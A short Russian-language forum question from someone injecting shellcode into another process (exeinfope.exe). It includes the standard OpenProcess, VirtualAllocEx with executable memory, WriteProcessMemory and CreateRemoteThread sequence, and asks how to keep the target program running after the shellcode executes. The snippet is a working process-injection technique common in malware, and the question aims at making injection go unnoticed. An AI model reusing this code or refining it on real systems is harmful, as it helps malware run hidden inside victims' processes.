Всем привет.
Я делаю инжект шеллкода в процесс, но после выполнения - процесс закрывается.
Логично предположить - ему некуда деваться, ведь после выполнения - нет возвращения управления приложению.
Как можно сделать, что бы после выполнения шеллкода - приложение работало нормально?
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetPID("exeinfope.exe"));
LPVOID remoteBuffer = VirtualAllocEx(hProc, NULL, sizeof xcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc, remoteBuffer, xcode, sizeof xcode, NULL);
HANDLE remoteThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, 0);
CloseHandle(hProc);
